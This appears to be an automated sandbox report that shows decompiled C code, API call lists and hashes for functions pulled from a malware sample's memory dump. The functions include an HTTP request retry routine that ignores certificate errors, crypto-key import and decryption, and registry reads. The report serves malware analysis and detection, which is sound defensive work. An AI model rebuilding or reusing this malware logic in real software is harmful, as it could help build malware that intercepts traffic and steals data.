                                                        • Instruction ID: ee4f864b92e48fe44d47e8182314d8ed201c4a0443db934211e87e3067890acb
                                                        • Opcode Fuzzy Hash: c55a4110cda8e521be48b8651574f433b0914c1cd3fff71dcb8dc7841252fbee
                                                        • Instruction Fuzzy Hash: 2CE04F3523823B9BDB336B6C9848BEE6B50BF00B44F005724A6C9D24D3CB10D8A187F1
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205DD0, Relevance: 2.6, APIs: 2, Instructions: 52COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 32%
                                                        			E01205DD0(intOrPtr _a4, signed int _a8) {
				long _v8;
				long _v12;
				char _v16;
				void* _t14;
				long _t15;
				char* _t17;
				intOrPtr* _t19;
				signed int _t22;

				_t19 = __imp__; // 0x7029e700
				_t22 =  ~_a8;
				_v12 = 0;
				asm("sbb esi, esi");
				while(1) {
					_v8 = 0;
					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
					if(_t14 != 0) {
						break;
					}
					_t15 = GetLastError();
					_v8 = _t15;
					if(_t15 != 0x2f8f) {
						if(_t15 == 0x2f00) {
							continue;
						}
					} else {
						_v16 = 0x3300;
						if(_v12 == 0) {
							_t17 =  &_v16;
							__imp__(_a4, 0x1f, _t17, 4);
							if(_t17 == 0) {
								_v8 = GetLastError();
							} else {
								_v12 = 1;
								continue;
							}
						}
					}
					L9:
					return _v8;
				}
				goto L9;
			}











                                                        0x01205dd7
                                                        0x01205de4
                                                        0x01205de6
                                                        0x01205de9
                                                        0x01205e2e
                                                        0x01205e36
                                                        0x01205e3c
                                                        0x01205e40
                                                        0x00000000
                                                        0x00000000
                                                        0x01205ded
                                                        0x01205df8
                                                        0x01205dfb
                                                        0x01205e2c
                                                        0x00000000
                                                        0x00000000
                                                        0x01205dfd
                                                        0x01205e00
                                                        0x01205e07
                                                        0x01205e0b
                                                        0x01205e14
                                                        0x01205e1c
                                                        0x01205e4a
                                                        0x01205e1e
                                                        0x01205e1e
                                                        0x00000000
                                                        0x01205e1e
                                                        0x01205e1c
                                                        0x01205e07
                                                        0x01205e4d
                                                        0x01205e54
                                                        0x01205e54
                                                        0x00000000

                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: ErrorLast
                                                        • String ID:
                                                        • API String ID: 1452528299-0
                                                        • Opcode ID: b5b520f1fed1c07a8ce980a09650fc2e5298ae35d09bf1cdc2f8697faab86f3e
                                                        • Instruction ID: 34e09a65eb430499c9ec1076e21cf09ad80e6b4e93e3fcadbe6be5a80714af86
                                                        • Opcode Fuzzy Hash: b5b520f1fed1c07a8ce980a09650fc2e5298ae35d09bf1cdc2f8697faab86f3e
                                                        • Instruction Fuzzy Hash: B7018435910119FBDF229F99DC4CD9EBFB8EB84740F10C266EA45E2186D7708A40CF60
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206FEA, Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 92%
                                                        			E01206FEA(signed int __eax, void* __ecx, intOrPtr* _a4, void** _a8, intOrPtr* _a12) {
				signed int _v5;
				signed int _v12;
				void* _t32;
				signed int _t37;
				signed int _t39;
				signed char _t45;
				void* _t49;
				char* _t51;
				signed int _t65;
				signed int _t66;
				signed int _t69;

				_v12 = _v12 & 0x00000000;
				_t69 = __eax;
				_t32 = RtlAllocateHeap( *0x120a290, 0, __eax << 2); // executed
				_t49 = _t32;
				if(_t49 == 0) {
					_v12 = 8;
				} else {
					 *_a8 = _t49;
					do {
						_t45 =  *_a4;
						asm("cdq");
						_t65 = 0x64;
						_t37 = (_t45 & 0x000000ff) / _t65;
						_v5 = _t37;
						if(_t37 != 0) {
							 *_t49 = _t37 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t37 * 0x9c;
						}
						asm("cdq");
						_t66 = 0xa;
						_t39 = (_t45 & 0x000000ff) / _t66;
						if(_t39 != 0 || _v5 != _t39) {
							 *_t49 = _t39 + 0x30;
							_t49 = _t49 + 1;
							_t45 = _t45 + _t39 * 0xf6;
						}
						_a4 = _a4 + 1;
						 *_t49 = _t45 + 0x30;
						 *(_t49 + 1) = 0x2c;
						_t49 = _t49 + 2;
						_t69 = _t69 - 1;
					} while (_t69 != 0);
					_t51 = _t49 - 1;
					 *_a12 = _t51 -  *_a8;
					 *_t51 = 0;
				}
				return _v12;
			}














                                                        0x01206fef
                                                        0x01206ff4
                                                        0x01207002
                                                        0x01207008
                                                        0x0120700c
                                                        0x0120707d
                                                        0x0120700e
                                                        0x01207012
                                                        0x01207015
                                                        0x01207018
                                                        0x0120701f
                                                        0x01207020
                                                        0x01207021
                                                        0x01207025
                                                        0x01207028
                                                        0x0120702f
                                                        0x01207035
                                                        0x01207036
                                                        0x01207036
                                                        0x0120703d
                                                        0x0120703e
                                                        0x0120703f
                                                        0x01207043
                                                        0x0120704f
                                                        0x01207055
                                                        0x01207056
                                                        0x01207056
                                                        0x01207058
                                                        0x0120705e
                                                        0x01207060
                                                        0x01207065
                                                        0x01207066
                                                        0x01207066
                                                        0x0120706c
                                                        0x01207075
                                                        0x01207077
                                                        0x0120707a
                                                        0x01207089

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01207002
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: f962603dcaa276facd293ea80e36c7da7f229ba6d295e0b0c82a2e5190590fbe
                                                        • Instruction ID: 5d56081f5da3577b4ca525958c7b3cfdd4f06466a06806050b7a51c2a838b86e
                                                        • Opcode Fuzzy Hash: f962603dcaa276facd293ea80e36c7da7f229ba6d295e0b0c82a2e5190590fbe
                                                        • Instruction Fuzzy Hash: AC1124752953459FEB06CF2CC841BE97BAADB13358F14428EE5808B2D3C277950BC720
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205ED2, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 34%
                                                        			E01205ED2(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v12;
				void* _v18;
				short _v20;
				intOrPtr _t15;
				short _t17;
				intOrPtr _t19;
				short _t23;

				_t23 = 0;
				_v20 = 0;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosw");
				_t15 =  *0x120a2d4; // 0x455d5a8
				_t4 = _t15 + 0x120b394; // 0x576893c
				_t20 = _t4;
				_t6 = _t15 + 0x120b124; // 0x650047
				_t17 = E01203969(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
				if(_t17 < 0) {
					_t23 = _t17;
				} else {
					if(_v20 != 8) {
						_t23 = 1;
					} else {
						_t19 = E01207206(_t20, _v12);
						if(_t19 == 0) {
							_t23 = 8;
						} else {
							 *_a16 = _t19;
						}
						__imp__#6(_v12);
					}
				}
				return _t23;
			}










                                                        0x01205edc
                                                        0x01205ede
                                                        0x01205ee5
                                                        0x01205ee6
                                                        0x01205ee7
                                                        0x01205ee8
                                                        0x01205eee
                                                        0x01205ef3
                                                        0x01205ef3
                                                        0x01205efd
                                                        0x01205f0f
                                                        0x01205f16
                                                        0x01205f45
                                                        0x01205f18
                                                        0x01205f1d
                                                        0x01205f42
                                                        0x01205f1f
                                                        0x01205f22
                                                        0x01205f29
                                                        0x01205f34
                                                        0x01205f2b
                                                        0x01205f2e
                                                        0x01205f2e
                                                        0x01205f38
                                                        0x01205f38
                                                        0x01205f1d
                                                        0x01205f4c

                                                        APIs
                                                          • Part of subcall function 01203969: SysFreeString.OLEAUT32(?), ref: 01203A48
                                                          • Part of subcall function 01207206: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,012067B6,004F0053,00000000,?), ref: 0120720F
                                                          • Part of subcall function 01207206: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,012067B6,004F0053,00000000,?), ref: 01207239
                                                          • Part of subcall function 01207206: memset.NTDLL ref: 0120724D
                                                        • SysFreeString.OLEAUT32(00000000), ref: 01205F38
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeString$lstrlenmemcpymemset
                                                        • String ID:
                                                        • API String ID: 397948122-0
                                                        • Opcode ID: 807149443be5a70bf637d943f7577ade329884ac697d0f455ff9d91926b6fbf4
                                                        • Instruction ID: 8b9b561182b9b65828d6f0739db47853ce05e880b1263fa9b62372207a39ee59
                                                        • Opcode Fuzzy Hash: 807149443be5a70bf637d943f7577ade329884ac697d0f455ff9d91926b6fbf4
                                                        • Instruction Fuzzy Hash: CD01B53152012ABFDF23AF98CC08DAEBB78FB05700F000659EA01E60A2D3749915CF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205963, Relevance: 1.5, APIs: 1, Instructions: 41memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 89%
                                                        			E01205963(signed int __eax, void* __ecx, intOrPtr* __esi, void* _a4) {
				char _v8;
				void* _t14;
				intOrPtr _t17;
				void* _t20;
				void* _t26;

				_push(__ecx);
				if(_a4 == 0 || __eax == 0) {
					_t26 = 0x57;
				} else {
					_t14 = E01206FEA(__eax,  &_a4, _a4,  &_a4,  &_v8); // executed
					_t26 = _t14;
					if(_t26 == 0) {
						_t17 =  *0x120a2d4; // 0x455d5a8
						_t9 = _t17 + 0x120b9e8; // 0x444f4340
						_t20 = E012015AB( *((intOrPtr*)(__esi + 4)),  *__esi, _t9, _a4, _v8, __esi + 8, __esi + 0xc); // executed
						_t26 = _t20;
						RtlFreeHeap( *0x120a290, 0, _a4); // executed
					}
				}
				return _t26;
			}








                                                        0x01205966
                                                        0x0120596c
                                                        0x012059c3
                                                        0x01205972
                                                        0x0120597d
                                                        0x01205982
                                                        0x01205986
                                                        0x01205993
                                                        0x0120599b
                                                        0x012059a7
                                                        0x012059af
                                                        0x012059b9
                                                        0x012059b9
                                                        0x01205986
                                                        0x012059c8

                                                        APIs
                                                          • Part of subcall function 01206FEA: RtlAllocateHeap.NTDLL(00000000,00000000,?), ref: 01207002
                                                          • Part of subcall function 012015AB: lstrlen.KERNEL32(74B5F710,?,00000000,?,74B5F710), ref: 012015DF
                                                          • Part of subcall function 012015AB: StrStrA.SHLWAPI(00000000,?), ref: 012015EC
                                                          • Part of subcall function 012015AB: RtlAllocateHeap.NTDLL(00000000,?), ref: 0120160B
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,?,444F4340,00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,012077F2), ref: 012059B9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Heap$Allocate$Freelstrlen
                                                        • String ID:
                                                        • API String ID: 2220322926-0
                                                        • Opcode ID: 7b87ba0d244e7bb75bfbc5fc5036d7eed7e87da267e04280e84eff7a004a8b71
                                                        • Instruction ID: 16b89d6e95356e26f10d0016477b5adc8f6a2a036d9c435c5b15094fb39f4832
                                                        • Opcode Fuzzy Hash: 7b87ba0d244e7bb75bfbc5fc5036d7eed7e87da267e04280e84eff7a004a8b71
                                                        • Instruction Fuzzy Hash: 67018136110209FFDB23CF48DC54EAA7FB9EB44354F104225FA0A861A2E731EA54DF90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01205FBC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01205FBC(long _a4) {
				void* _t2;

				_t2 = RtlAllocateHeap( *0x120a290, 0, _a4); // executed
				return _t2;
			}




                                                        0x01205fc8
                                                        0x01205fce

                                                        APIs
                                                        • RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: AllocateHeap
                                                        • String ID:
                                                        • API String ID: 1279760036-0
                                                        • Opcode ID: 9b9b44285a1626fd51879d755a3f62f02156169109145f208788daa00fe48766
                                                        • Instruction ID: d8b318dd396420de31b340ef5e810d2d0b157cbefe668f5e0beec5a246f2371f
                                                        • Opcode Fuzzy Hash: 9b9b44285a1626fd51879d755a3f62f02156169109145f208788daa00fe48766
                                                        • Instruction Fuzzy Hash: 7BB01231018200AFCE238B00FD0CF057B33B750B00F108120B2090106A82320420EB04
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012013CC, Relevance: 1.5, APIs: 1, Instructions: 5memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E012013CC(void* _a4) {
				char _t2;

				_t2 = RtlFreeHeap( *0x120a290, 0, _a4); // executed
				return _t2;
			}




                                                        0x012013d8
                                                        0x012013de

                                                        APIs
                                                        • RtlFreeHeap.NTDLL(00000000,00000000,012020F3,00000000,00000000,?,00000000,?,?,?,?,?,012068A9,00000000,?,00000001), ref: 012013D8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: FreeHeap
                                                        • String ID:
                                                        • API String ID: 3298025750-0
                                                        • Opcode ID: a5035acadc35d692facde243f4227eca0e4e4b026d47775a1d7b87a5f6c7b45d
                                                        • Instruction ID: 4e6241b6952f41753a32d6b6a43e9fab4f4a0ea1e03a31fc2f6265c31479bb34
                                                        • Opcode Fuzzy Hash: a5035acadc35d692facde243f4227eca0e4e4b026d47775a1d7b87a5f6c7b45d
                                                        • Instruction Fuzzy Hash: AEB01271104200AFCF338B00FE0CF057B23B750B00F004120B30D0007A82320420FF15
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01202879, Relevance: 1.3, APIs: 1, Instructions: 99COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01202879(intOrPtr* __eax, void* __ecx, void* __edx, void* _a4, void** _a8) {
				void* _v8;
				int _v12;
				char _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				char _v32;
				char _v144;
				int _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				char _v164;
				void* _t37;
				void* _t42;
				void* _t51;
				int _t53;
				void* _t60;
				void* _t63;
				void* _t64;

				_t53 = 0;
				_t60 = __ecx;
				_v16 = 0;
				_v12 = 0;
				_v8 = 0;
				if(__ecx <= 0x80 ||  *__eax != 0x400) {
					L21:
					return _t53;
				} else {
					_t58 =  &_v164;
					_t37 = E01203C51(__eax, __edx,  &_v164,  &_v16, _a4 + __ecx - 0x80);
					if(_t37 != 0) {
						goto L21;
					}
					_t61 = _t60 - 0x80;
					if(_v148 > _t60 - 0x80) {
						goto L21;
					}
					while( *((intOrPtr*)(_t64 + _t37 - 0x8c)) == _t53) {
						_t37 = _t37 + 1;
						if(_t37 < 0x10) {
							continue;
						}
						_t53 = _v148;
						_t51 = E01205FBC(_t53);
						_t73 = _t51;
						_v8 = _t51;
						if(_t51 != 0) {
							_t53 = 0;
							L18:
							if(_t53 != 0) {
								goto L21;
							}
							L19:
							if(_v8 != 0) {
								E012013CC(_v8);
							}
							goto L21;
						}
						memcpy(_t51, _a4, _t53);
						L8:
						_t63 = _v8;
						E01202C05(_t58, _t73, _t63, _t53,  &_v32);
						if(_v32 != _v164 || _v28 != _v160 || _v24 != _v156 || _v20 != _v152) {
							L15:
							_t53 = 0;
							goto L19;
						} else {
							 *_a8 = _t63;
							goto L18;
						}
					}
					_t58 =  &_v144;
					_t42 = E01203276(_t61 & 0xfffffff0, 0,  &_v144, _a4,  &_v8,  &_v12); // executed
					__eflags = _t42;
					if(_t42 != 0) {
						_t53 = _v12;
						goto L18;
					}
					_t53 = _v148;
					__eflags = _v12 - _t53;
					if(__eflags >= 0) {
						goto L8;
					}
					goto L15;
				}
			}























                                                        0x01202884
                                                        0x01202887
                                                        0x01202890
                                                        0x01202893
                                                        0x01202896
                                                        0x01202899
                                                        0x01202995
                                                        0x01202999
                                                        0x012028ab
                                                        0x012028b7
                                                        0x012028be
                                                        0x012028c5
                                                        0x00000000
                                                        0x00000000
                                                        0x012028cb
                                                        0x012028d3
                                                        0x00000000
                                                        0x00000000
                                                        0x012028d9
                                                        0x012028e2
                                                        0x012028e6
                                                        0x00000000
                                                        0x00000000
                                                        0x012028e8
                                                        0x012028ef
                                                        0x012028f4
                                                        0x012028f6
                                                        0x012028f9
                                                        0x0120297a
                                                        0x01202981
                                                        0x01202983
                                                        0x00000000
                                                        0x00000000
                                                        0x01202985
                                                        0x01202989
                                                        0x0120298e
                                                        0x0120298e
                                                        0x00000000
                                                        0x01202989
                                                        0x01202900
                                                        0x01202908
                                                        0x01202908
                                                        0x01202911
                                                        0x0120291f
                                                        0x01202976
                                                        0x01202976
                                                        0x00000000
                                                        0x01202942
                                                        0x01202945
                                                        0x00000000
                                                        0x01202945
                                                        0x0120291f
                                                        0x01202954
                                                        0x01202962
                                                        0x01202967
                                                        0x01202969
                                                        0x0120297e
                                                        0x00000000
                                                        0x0120297e
                                                        0x0120296b
                                                        0x01202971
                                                        0x01202974
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000
                                                        0x01202974

                                                        APIs
                                                        • memcpy.NTDLL(00000000,?,?,?,?,0120517B,?,0120517B,?,0120517B), ref: 01202900
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: memcpy
                                                        • String ID:
                                                        • API String ID: 3510742995-0
                                                        • Opcode ID: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                        • Instruction ID: f70acaf2942dc9933e87fe781e24cb7f397d9ff771f3dfc4b446e8d6ec6097d1
                                                        • Opcode Fuzzy Hash: 647bc8f6d7f8c9729684f43621a4d6fa48c0cfc356c6c07f18a6e3ed7e17fe69
                                                        • Instruction Fuzzy Hash: F631547192011EEFDF13DF98C8C4BADB778BB14254F2046AAE649A3193D7309E45CB50
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 012011B0, Relevance: 1.3, APIs: 1, Instructions: 42memoryCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E012011B0(intOrPtr* __edi, void* _a4, void* _a8, unsigned int _a12) {
				void* _t24;
				signed short _t25;
				signed int _t27;
				intOrPtr* _t28;
				signed short _t29;

				_t28 = __edi;
				if(_a4 == 0) {
					L2:
					_t29 = E01203B91(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
					if(_t29 == 0) {
						_t27 = _a12 >> 1;
						if(_t27 == 0) {
							_t29 = 2;
							HeapFree( *0x120a290, 0, _a4);
						} else {
							_t24 = _a4;
							 *(_t24 + _t27 * 2 - 2) =  *(_t24 + _t27 * 2 - 2) & _t29;
							 *_t28 = _t24;
						}
					}
					L6:
					return _t29;
				}
				_t25 = E01205ED2(_a4, _a8, _a12, __edi); // executed
				_t29 = _t25;
				if(_t29 == 0) {
					goto L6;
				}
				goto L2;
			}








                                                        0x012011b0
                                                        0x012011b8
                                                        0x012011cf
                                                        0x012011ea
                                                        0x012011ee
                                                        0x012011f3
                                                        0x012011f5
                                                        0x01201205
                                                        0x01201211
                                                        0x012011f7
                                                        0x012011f7
                                                        0x012011fa
                                                        0x012011ff
                                                        0x012011ff
                                                        0x012011f5
                                                        0x01201217
                                                        0x0120121b
                                                        0x0120121b
                                                        0x012011c4
                                                        0x012011c9
                                                        0x012011cd
                                                        0x00000000
                                                        0x00000000
                                                        0x00000000

                                                        APIs
                                                          • Part of subcall function 01205ED2: SysFreeString.OLEAUT32(00000000), ref: 01205F38
                                                        • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74B5F710,?,00000000,?,00000000,?,01205372,?,004F0053,05769318,00000000,?), ref: 01201211
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Free$HeapString
                                                        • String ID:
                                                        • API String ID: 3806048269-0
                                                        • Opcode ID: d604f69b95a90f13ea264d4af7f09aaa442b6a1c3e173ac9ef5e607ba34e51ef
                                                        • Instruction ID: 41c3b22cda32e11a3f5e2f65dab5ef0445bf4ef876bfd4ec34fe4bd2030df11a
                                                        • Opcode Fuzzy Hash: d604f69b95a90f13ea264d4af7f09aaa442b6a1c3e173ac9ef5e607ba34e51ef
                                                        • Instruction Fuzzy Hash: A901287201022ABFCB239F48CC05FAA3B65BB54790F048229FF099A1A2D731C970DB90
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206E5D, Relevance: 1.3, APIs: 1, Instructions: 36stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 75%
                                                        			E01206E5D(void* __ecx, void* __edx, void* _a4, void* _a8) {
				void* _t13;
				void* _t21;

				_t11 =  &_a4;
				_t21 = 0;
				__imp__( &_a8);
				_t13 = E01203276( &_a4 + 1, 1, _a8, _a4, _a4, _t11); // executed
				if(_t13 == 0) {
					_t21 = E01205FBC(_a8 + _a8);
					if(_t21 != 0) {
						E012061A5(_a4, _t21, _t23);
					}
					E012013CC(_a4);
				}
				return _t21;
			}





                                                        0x01206e65
                                                        0x01206e6c
                                                        0x01206e6e
                                                        0x01206e7d
                                                        0x01206e84
                                                        0x01206e93
                                                        0x01206e97
                                                        0x01206e9e
                                                        0x01206e9e
                                                        0x01206ea6
                                                        0x01206eab
                                                        0x01206eb0

                                                        APIs
                                                        • lstrlen.KERNEL32(00000000,00000000,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000,01204A9F,00000000,05769630), ref: 01206E6E
                                                          • Part of subcall function 01203276: CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,00000000,00000000,00000000,?,?,?,01206E82,00000001,01204A9F,00000000), ref: 012032AE
                                                          • Part of subcall function 01203276: memcpy.NTDLL(01206E82,01204A9F,00000010,?,?,?,01206E82,00000001,01204A9F,00000000,?,012071BA,00000000,01204A9F,?,00000000), ref: 012032C7
                                                          • Part of subcall function 01203276: CryptImportKey.ADVAPI32(?,?,0000001C,00000000,00000000,00000000), ref: 012032F0
                                                          • Part of subcall function 01203276: CryptSetKeyParam.ADVAPI32(00000000,00000001,?,00000000), ref: 01203308
                                                          • Part of subcall function 01203276: memcpy.NTDLL(00000000,00000000,05769630,00000010), ref: 0120335A
                                                          • Part of subcall function 01205FBC: RtlAllocateHeap.NTDLL(00000000,00000000,01202035), ref: 01205FC8
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: Crypt$memcpy$AcquireAllocateContextHeapImportParamlstrlen
                                                        • String ID:
                                                        • API String ID: 894908221-0
                                                        • Opcode ID: afdbbeb2547c8c1b1044408f6359658ab7474c2b377c087a4891b88c33c88786
                                                        • Instruction ID: 08cb88be099e749d0ff387bdf1a9a441e73e4d93f3bc4ad582a1457daa3f9295
                                                        • Opcode Fuzzy Hash: afdbbeb2547c8c1b1044408f6359658ab7474c2b377c087a4891b88c33c88786
                                                        • Instruction Fuzzy Hash: FEF0303611050ABEDF136F55DC04CEB3FAEEF95250B008125B918CA152DA32DA559BA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 0120304F, Relevance: 1.3, APIs: 1, Instructions: 26stringCOMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E0120304F(intOrPtr _a4, intOrPtr _a8, void* _a12, intOrPtr _a16, WCHAR* _a20) {
				void* _t17;

				if(_a4 == 0) {
					L2:
					return E012065FA(_a8, 1, _a12, _a16, _a20, lstrlenW(_a20) + _t14 + 2);
				}
				_t17 = E01205F4F(_a4, _a8, _a12, _a16, _a20); // executed
				if(_t17 != 0) {
					goto L2;
				}
				return _t17;
			}




                                                        0x01203057
                                                        0x01203071
                                                        0x00000000
                                                        0x0120308d
                                                        0x01203068
                                                        0x0120306f
                                                        0x00000000
                                                        0x00000000
                                                        0x01203094

                                                        APIs
                                                        • lstrlenW.KERNEL32(?,?,?,01205611,3D012090,80000002,0120755B,01203E52,74666F53,4D4C4B48,01203E52,?,3D012090,80000002,0120755B,?), ref: 01203074
                                                          • Part of subcall function 01205F4F: SysAllocString.OLEAUT32(01203E52), ref: 01205F69
                                                          • Part of subcall function 01205F4F: SysFreeString.OLEAUT32(00000000), ref: 01205FA9
                                                        Memory Dump Source
                                                        • Source File: 00000022.00000002.678003516.0000000001201000.00000020.00020000.sdmp, Offset: 01200000, based on PE: true
                                                        • Associated: 00000022.00000002.677991966.0000000001200000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678015887.0000000001209000.00000002.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678024565.000000000120A000.00000004.00020000.sdmp Download File
                                                        • Associated: 00000022.00000002.678033476.000000000120C000.00000002.00020000.sdmp Download File
                                                        Similarity
                                                        • API ID: String$AllocFreelstrlen
                                                        • String ID:
                                                        • API String ID: 3808004451-0
                                                        • Opcode ID: 57a5c5e9b51210b1889b3a16cfed620eeeaa8e1c09df4d930de274d8fc62c2a8
                                                        • Instruction ID: 6d1c9bdd7ce29c5840d89ca8b570a1e610710299d1a7f4a2babbce6d72ea9005
                                                        • Opcode Fuzzy Hash: 57a5c5e9b51210b1889b3a16cfed620eeeaa8e1c09df4d930de274d8fc62c2a8
                                                        • Instruction Fuzzy Hash: 94F0923201020EFFDF169F94EC49EAA3F6AFB18354F048115FA19540A2D732C5B1EBA0
                                                        Uniqueness

                                                        Uniqueness Score: -1.00%

                                                        Function 01206997, Relevance: 1.3, APIs: 1, Instructions: 23COMMON
                                                        Download Yara Rule
                                                        C-Code - Quality: 100%
                                                        			E01206997(void* __edi, void* _a4) {
